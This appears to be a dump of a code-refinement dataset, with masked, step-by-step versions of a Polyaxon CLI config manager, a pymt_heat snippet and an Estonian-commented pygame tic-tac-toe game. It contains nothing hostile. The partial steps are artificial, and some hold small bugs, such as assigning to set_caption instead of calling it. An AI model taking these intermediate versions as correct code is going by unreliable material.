@classmethod
def should_check(cls):
count = cls._get_count()
cls.reset(check_count=count)
if count > cls.FREQUENCY:
return True
config = cls.get_config_or_default()
if config.current_version is None or config.min_version is None:
return True
return LooseVersion(config.current_version) < LooseVersion(config.min_version)
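# A minimal usage sketch (pkg_version and server_info below are placeholders,
# not part of this module): a CLI entrypoint could rate-limit compatibility
# checks with something like
#
#     if CliConfigManager.should_check():
#         # ...query the API for compatibility info, then persist it...
#         CliConfigManager.reset(current_version=pkg_version, server_versions=server_info)
#
# should_check() returns True once the stored check counter exceeds FREQUENCY,
# when version information is missing, or when current_version is older than
# the recorded min_version.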
|
normal
|
{
"blob_id": "fd391d28d76b0c1b3cf6d0b5134390ab3f1267fb",
"index": 5152,
"step-1": "<mask token>\n\n\nclass CliConfigManager(BaseConfigManager):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(cls, check_count=None, current_version=None, server_versions=\n None, log_handler=None):\n if not any([check_count, current_version, server_versions, log_handler]\n ):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.\n min_version)\n",
"step-2": "<mask token>\n\n\nclass CliConfigManager(BaseConfigManager):\n <mask token>\n VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL\n CONFIG_FILE_NAME = '.cli'\n CONFIG = CliConfigurationConfig\n FREQUENCY = 3\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(cls, check_count=None, current_version=None, server_versions=\n None, log_handler=None):\n if not any([check_count, current_version, server_versions, log_handler]\n ):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.\n min_version)\n",
"step-3": "<mask token>\n\n\nclass CliConfigManager(BaseConfigManager):\n \"\"\"Manages access cli configuration .cli file.\"\"\"\n VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL\n CONFIG_FILE_NAME = '.cli'\n CONFIG = CliConfigurationConfig\n FREQUENCY = 3\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(cls, check_count=None, current_version=None, server_versions=\n None, log_handler=None):\n if not any([check_count, current_version, server_versions, log_handler]\n ):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.\n min_version)\n",
"step-4": "from distutils.version import LooseVersion\nfrom polyaxon.managers.base import BaseConfigManager\nfrom polyaxon.schemas.cli.cli_config import CliConfigurationConfig\n\n\nclass CliConfigManager(BaseConfigManager):\n \"\"\"Manages access cli configuration .cli file.\"\"\"\n VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL\n CONFIG_FILE_NAME = '.cli'\n CONFIG = CliConfigurationConfig\n FREQUENCY = 3\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(cls, check_count=None, current_version=None, server_versions=\n None, log_handler=None):\n if not any([check_count, current_version, server_versions, log_handler]\n ):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.\n min_version)\n",
"step-5": "#!/usr/bin/python\n#\n# Copyright 2018-2020 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom distutils.version import LooseVersion # pylint:disable=import-error\n\nfrom polyaxon.managers.base import BaseConfigManager\nfrom polyaxon.schemas.cli.cli_config import CliConfigurationConfig\n\n\nclass CliConfigManager(BaseConfigManager):\n \"\"\"Manages access cli configuration .cli file.\"\"\"\n\n VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL\n CONFIG_FILE_NAME = \".cli\"\n CONFIG = CliConfigurationConfig\n FREQUENCY = 3\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(\n cls,\n check_count=None,\n current_version=None,\n server_versions=None,\n log_handler=None,\n ):\n if not any([check_count, current_version, server_versions, log_handler]):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.min_version)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(n)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
heat = Heatmodel()
n = heat.get_component_name()
print(n)
<|reserved_special_token_1|>
from pymt_heat import Heatmodel
heat = Heatmodel()
n = heat.get_component_name()
print(n)
|
flexible
|
{
"blob_id": "82801ce564f4f29e084e6f842d7868eb60f582cb",
"index": 6225,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(n)\n",
"step-3": "<mask token>\nheat = Heatmodel()\nn = heat.get_component_name()\nprint(n)\n",
"step-4": "from pymt_heat import Heatmodel\nheat = Heatmodel()\nn = heat.get_component_name()\nprint(n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def näita_tabelit(ttt, tabel):
hetkeseis(tabel)
ttt.blit(tabel, (0, 0))
pygame.display.flip()
def hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):
if Ykoordinaat < 100:
rida = 0
elif Ykoordinaat < 200:
rida = 1
else:
rida = 2
if Xkoordinaat < 100:
veerg = 0
elif Xkoordinaat < 200:
veerg = 1
else:
veerg = 2
return rida, veerg
def klikk_tabelis(tabel):
global joonestik, XO
Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()
rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':
return
joonistamine(tabel, rida, veerg, XO)
if XO == 'X':
XO = 'O'
else:
XO = 'X'
def joonistamine(tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
Ykeskkoht = tabelirida * 100 + 50
if Tähis == 'O':
pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),
(Xkeskkoht + 22, Ykeskkoht + 22), 2)
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),
(Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis
def mängu_võitja(tabel):
global joonestik, võitja
for rida in range(0, 3):
if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2
] and joonestik[rida][0] is not None:
võitja = joonestik[rida][0]
pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),
(300, (rida + 1) * 100 - 50), 2)
break
for veerg in range(0, 3):
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg
] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg]
pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0
), ((veerg + 1) * 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0
] is not None:
võitja = joonestik[0][0]
pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2
] is not None:
võitja = joonestik[0][2]
pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)
def hetkeseis(tabel):
global XO, võitja
if võitja is None:
sõnum = XO + ' käib'
else:
sõnum = võitja + ' võitis!'
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0, 0, 0))
tabel.fill((250, 250, 250), (0, 300, 300, 25))
tabel.blit(tekst, (10, 300))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_tabel(ttt):
taust = pygame.Surface(ttt.get_size())
taust = taust.convert()
taust.fill((250, 250, 250))
pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)
return taust
def näita_tabelit(ttt, tabel):
hetkeseis(tabel)
ttt.blit(tabel, (0, 0))
pygame.display.flip()
def hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):
if Ykoordinaat < 100:
rida = 0
elif Ykoordinaat < 200:
rida = 1
else:
rida = 2
if Xkoordinaat < 100:
veerg = 0
elif Xkoordinaat < 200:
veerg = 1
else:
veerg = 2
return rida, veerg
def klikk_tabelis(tabel):
global joonestik, XO
Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()
rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':
return
joonistamine(tabel, rida, veerg, XO)
if XO == 'X':
XO = 'O'
else:
XO = 'X'
def joonistamine(tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
Ykeskkoht = tabelirida * 100 + 50
if Tähis == 'O':
pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),
(Xkeskkoht + 22, Ykeskkoht + 22), 2)
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),
(Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis
def mängu_võitja(tabel):
global joonestik, võitja
for rida in range(0, 3):
if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2
] and joonestik[rida][0] is not None:
võitja = joonestik[rida][0]
pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),
(300, (rida + 1) * 100 - 50), 2)
break
for veerg in range(0, 3):
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg
] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg]
pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0
), ((veerg + 1) * 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0
] is not None:
võitja = joonestik[0][0]
pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2
] is not None:
võitja = joonestik[0][2]
pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)
def hetkeseis(tabel):
global XO, võitja
if võitja is None:
sõnum = XO + ' käib'
else:
sõnum = võitja + ' võitis!'
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0, 0, 0))
tabel.fill((250, 250, 250), (0, 300, 300, 25))
tabel.blit(tekst, (10, 300))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
pygame.init()
ttt = pygame.display.set_mode((300, 325))
pygame.display.set_caption = 'Trips-Traps-Trull'
võitja = None
def init_tabel(ttt):
taust = pygame.Surface(ttt.get_size())
taust = taust.convert()
taust.fill((250, 250, 250))
pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)
return taust
def näita_tabelit(ttt, tabel):
hetkeseis(tabel)
ttt.blit(tabel, (0, 0))
pygame.display.flip()
def hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):
if Ykoordinaat < 100:
rida = 0
elif Ykoordinaat < 200:
rida = 1
else:
rida = 2
if Xkoordinaat < 100:
veerg = 0
elif Xkoordinaat < 200:
veerg = 1
else:
veerg = 2
return rida, veerg
def klikk_tabelis(tabel):
global joonestik, XO
Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()
rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':
return
joonistamine(tabel, rida, veerg, XO)
if XO == 'X':
XO = 'O'
else:
XO = 'X'
def joonistamine(tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
Ykeskkoht = tabelirida * 100 + 50
if Tähis == 'O':
pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),
(Xkeskkoht + 22, Ykeskkoht + 22), 2)
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),
(Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis
def mängu_võitja(tabel):
global joonestik, võitja
for rida in range(0, 3):
if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2
] and joonestik[rida][0] is not None:
võitja = joonestik[rida][0]
pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),
(300, (rida + 1) * 100 - 50), 2)
break
for veerg in range(0, 3):
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg
] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg]
pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0
), ((veerg + 1) * 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0
] is not None:
võitja = joonestik[0][0]
pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2
] is not None:
võitja = joonestik[0][2]
pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)
def hetkeseis(tabel):
global XO, võitja
if võitja is None:
sõnum = XO + ' käib'
else:
sõnum = võitja + ' võitis!'
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0, 0, 0))
tabel.fill((250, 250, 250), (0, 300, 300, 25))
tabel.blit(tekst, (10, 300))
XO = 'X'
joonestik = [[None, None, None], [None, None, None], [None, None, None]]
tabel = init_tabel(ttt)
jooksutab = 1
while jooksutab == 1:
for event in pygame.event.get():
if event.type is QUIT:
jooksutab = 0
elif event.type is MOUSEBUTTONDOWN:
klikk_tabelis(tabel)
mängu_võitja(tabel)
näita_tabelit(ttt, tabel)
if võitja is not None:
break
<|reserved_special_token_1|>
import pygame
from pygame.locals import *
pygame.init()
ttt = pygame.display.set_mode((300, 325))
pygame.display.set_caption = 'Trips-Traps-Trull'
võitja = None
def init_tabel(ttt):
taust = pygame.Surface(ttt.get_size())
taust = taust.convert()
taust.fill((250, 250, 250))
pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)
pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)
return taust
def näita_tabelit(ttt, tabel):
hetkeseis(tabel)
ttt.blit(tabel, (0, 0))
pygame.display.flip()
def hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):
if Ykoordinaat < 100:
rida = 0
elif Ykoordinaat < 200:
rida = 1
else:
rida = 2
if Xkoordinaat < 100:
veerg = 0
elif Xkoordinaat < 200:
veerg = 1
else:
veerg = 2
return rida, veerg
def klikk_tabelis(tabel):
global joonestik, XO
Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()
rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)
if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':
return
joonistamine(tabel, rida, veerg, XO)
if XO == 'X':
XO = 'O'
else:
XO = 'X'
def joonistamine(tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
Ykeskkoht = tabelirida * 100 + 50
if Tähis == 'O':
pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),
(Xkeskkoht + 22, Ykeskkoht + 22), 2)
pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),
(Xkeskkoht - 22, Ykeskkoht + 22), 2)
joonestik[tabelirida][tabeliveerg] = Tähis
def mängu_võitja(tabel):
global joonestik, võitja
for rida in range(0, 3):
if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2
] and joonestik[rida][0] is not None:
võitja = joonestik[rida][0]
pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),
(300, (rida + 1) * 100 - 50), 2)
break
for veerg in range(0, 3):
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg
] and joonestik[0][veerg] is not None:
võitja = joonestik[0][veerg]
pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0
), ((veerg + 1) * 100 - 50, 300), 2)
break
if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0
] is not None:
võitja = joonestik[0][0]
pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2
] is not None:
võitja = joonestik[0][2]
pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)
def hetkeseis(tabel):
global XO, võitja
if võitja is None:
sõnum = XO + ' käib'
else:
sõnum = võitja + ' võitis!'
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0, 0, 0))
tabel.fill((250, 250, 250), (0, 300, 300, 25))
tabel.blit(tekst, (10, 300))
XO = 'X'
joonestik = [[None, None, None], [None, None, None], [None, None, None]]
tabel = init_tabel(ttt)
jooksutab = 1
while jooksutab == 1:
for event in pygame.event.get():
        if event.type == QUIT:
jooksutab = 0
        elif event.type == MOUSEBUTTONDOWN:
klikk_tabelis(tabel)
mängu_võitja(tabel)
näita_tabelit(ttt, tabel)
if võitja is not None:
break
<|reserved_special_token_1|>
import pygame
from pygame.locals import *
pygame.init()
ttt = pygame.display.set_mode((300,325)) #create the game window
pygame.display.set_caption("Trips-Traps-Trull")
võitja = None
def init_tabel(ttt):
taust = pygame.Surface(ttt.get_size())
taust = taust.convert()
taust.fill((250,250,250))
    #draw the grid lines
    pygame.draw.line (taust, (0,0,0), (100,0), (100,300), 2) #vertical lines
    pygame.draw.line (taust, (0,0,0), (200,0), (200,300), 2)
    pygame.draw.line (taust, (0,0,0), (0,100), (300,100), 2) #horizontal lines
pygame.draw.line (taust, (0,0,0), (0,200), (300,200), 2)
return taust
def näita_tabelit (ttt, tabel):
hetkeseis(tabel)
ttt.blit (tabel, (0,0))
pygame.display.flip()
def hiire_positsioon_tabelis (Xkoordinaat, Ykoordinaat):
    if (Ykoordinaat < 100): #which row was clicked
rida = 0
elif (Ykoordinaat < 200):
rida = 1
else:
rida = 2
    if (Xkoordinaat < 100): #which column was clicked
veerg = 0
elif (Xkoordinaat < 200):
veerg = 1
else:
veerg = 2
return (rida, veerg)
def klikk_tabelis (tabel): #work out where the click landed
global joonestik, XO
(Xkoordinaat, Ykoordinaat) = pygame.mouse.get_pos()
(rida, veerg) = hiire_positsioon_tabelis (Xkoordinaat, Ykoordinaat)
    if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O': #check whether the cell is already taken
        return #the cell is already in use
    joonistamine (tabel, rida, veerg, XO) #draw an X or an O
if (XO == 'X'):
        XO = 'O' #hand the turn over to the other player
else:
XO = 'X'
def joonistamine (tabel, tabelirida, tabeliveerg, Tähis):
Xkeskkoht = tabeliveerg * 100 + 50
    #find the center of the cell
Ykeskkoht = tabelirida * 100 + 50
    if (Tähis == 'O'): #draw an O
pygame.draw.circle (tabel, (0,0,0), (Xkeskkoht, Ykeskkoht), 44, 2)
else:
pygame.draw.line (tabel, (0,0,0), (Xkeskkoht - 22, Ykeskkoht - 22), (Xkeskkoht + 22, Ykeskkoht + 22), 2)
        #draw an X
pygame.draw.line (tabel, (0,0,0), (Xkeskkoht + 22, Ykeskkoht - 22), (Xkeskkoht - 22, Ykeskkoht + 22), 2)
    joonestik[tabelirida][tabeliveerg] = Tähis #mark the cell as used
def mängu_võitja(tabel): #checks whether either player has won
global joonestik, võitja
    for rida in range (0, 3): #check the rows
if joonestik [rida][0] == joonestik[rida][1] == joonestik[rida][2] and joonestik [rida][0] is not None:
            võitja = joonestik[rida][0] #this row won
pygame.draw.line (tabel, (250,0,0), (0, (rida + 1)*100 - 50), (300, (rida + 1)*100 - 50), 2)
break
    for veerg in range (0, 3): #check the columns
if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg] and joonestik[0][veerg] is not None:
            võitja = joonestik[0][veerg] #this column won
pygame.draw.line (tabel, (250,0,0), ((veerg + 1)* 100 - 50, 0), ((veerg + 1)* 100 - 50, 300), 2)
break
    if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0] is not None: #check the diagonals
        võitja = joonestik[0][0] #the left-to-right diagonal won
pygame.draw.line (tabel, (250,0,0), (50, 50), (250, 250), 2)
if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2] is not None:
        võitja = joonestik[0][2] #the right-to-left diagonal won
pygame.draw.line (tabel, (250,0,0), (250, 50), (50, 250), 2)
def hetkeseis (tabel): #show the current state (whose turn it is / who won)
global XO, võitja
if võitja is None:
sõnum = XO + " käib"
else:
sõnum = võitja + " võitis!"
font = pygame.font.Font(None, 24)
tekst = font.render(sõnum, 1, (0,0,0))
    #copy the message into the game window
tabel.fill ((250, 250, 250), (0, 300, 300, 25))
tabel.blit (tekst, (10, 300))
XO = 'X' #X starts
joonestik = [ [ None, None, None ], #empty cells
[ None, None, None ],
[ None, None, None ] ]
tabel = init_tabel(ttt)
jooksutab = 1
while jooksutab == 1:
for event in pygame.event.get():
        if event.type == QUIT:
            jooksutab = 0
        elif event.type == MOUSEBUTTONDOWN:
            klikk_tabelis(tabel)
    mängu_võitja(tabel) #check for a winner after every move
    näita_tabelit(ttt,tabel) #refresh the game board
if võitja is not None:
break
|
flexible
|
{
"blob_id": "a667c4cb0a30ee67fe982bb96ece6bb75f25f110",
"index": 7084,
"step-1": "<mask token>\n\n\ndef näita_tabelit(ttt, tabel):\n hetkeseis(tabel)\n ttt.blit(tabel, (0, 0))\n pygame.display.flip()\n\n\ndef hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):\n if Ykoordinaat < 100:\n rida = 0\n elif Ykoordinaat < 200:\n rida = 1\n else:\n rida = 2\n if Xkoordinaat < 100:\n veerg = 0\n elif Xkoordinaat < 200:\n veerg = 1\n else:\n veerg = 2\n return rida, veerg\n\n\ndef klikk_tabelis(tabel):\n global joonestik, XO\n Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()\n rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':\n return\n joonistamine(tabel, rida, veerg, XO)\n if XO == 'X':\n XO = 'O'\n else:\n XO = 'X'\n\n\ndef joonistamine(tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n Ykeskkoht = tabelirida * 100 + 50\n if Tähis == 'O':\n pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)\n else:\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),\n (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),\n (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n joonestik[tabelirida][tabeliveerg] = Tähis\n\n\ndef mängu_võitja(tabel):\n global joonestik, võitja\n for rida in range(0, 3):\n if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2\n ] and joonestik[rida][0] is not None:\n võitja = joonestik[rida][0]\n pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),\n (300, (rida + 1) * 100 - 50), 2)\n break\n for veerg in range(0, 3):\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg\n ] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg]\n pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0\n ), ((veerg + 1) * 100 - 50, 300), 2)\n break\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0\n ] is not None:\n võitja = joonestik[0][0]\n pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2\n ] is not None:\n võitja = joonestik[0][2]\n pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis(tabel):\n global XO, võitja\n if võitja is None:\n sõnum = XO + ' käib'\n else:\n sõnum = võitja + ' võitis!'\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0, 0, 0))\n tabel.fill((250, 250, 250), (0, 300, 300, 25))\n tabel.blit(tekst, (10, 300))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_tabel(ttt):\n taust = pygame.Surface(ttt.get_size())\n taust = taust.convert()\n taust.fill((250, 250, 250))\n pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)\n return taust\n\n\ndef näita_tabelit(ttt, tabel):\n hetkeseis(tabel)\n ttt.blit(tabel, (0, 0))\n pygame.display.flip()\n\n\ndef hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):\n if Ykoordinaat < 100:\n rida = 0\n elif Ykoordinaat < 200:\n rida = 1\n else:\n rida = 2\n if Xkoordinaat < 100:\n veerg = 0\n elif Xkoordinaat < 200:\n veerg = 1\n else:\n veerg = 2\n return rida, veerg\n\n\ndef klikk_tabelis(tabel):\n global joonestik, XO\n Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()\n rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':\n return\n joonistamine(tabel, rida, veerg, XO)\n if XO == 'X':\n XO = 'O'\n else:\n XO = 'X'\n\n\ndef joonistamine(tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = 